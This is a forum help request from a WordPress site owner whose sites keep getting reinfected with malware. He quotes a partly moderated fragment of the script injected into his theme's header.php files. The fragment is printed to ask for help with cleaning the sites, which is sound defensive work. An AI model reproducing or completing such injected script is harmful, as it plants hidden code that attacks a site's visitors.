Hey guys,
I got the red malware screen on my site (http://www.thedigitalventure.com) a few days ago, and quickly discovered all my sites had been infected.
So I ran some tests using Securi and WordFence, which allowed me to locate the malicious code.
This code was in the <head> tags of each of my theme header.php files:
<script>var a='';setTimeout(10 [code moderated] nent(window.location.host))+'"><'+'/script>');}</script>I removed it, submitted a request to Google and my site was back online. Unfortunately, it came back after 2 days :(
From what I've read, the code I found probably wasn't the source of the infection and it'll keep coming back until I pull out the root. Problem is, I have no idea how to find it.
At this point I'm really stuck, no idea what to do next. ANY help is appreciated!
Thanks,
Lewis.
P.S. I'm on the latest version of WordPress and all my plugins are updated. I didn't update my theme though because I didn't want it to overwrite my customisations.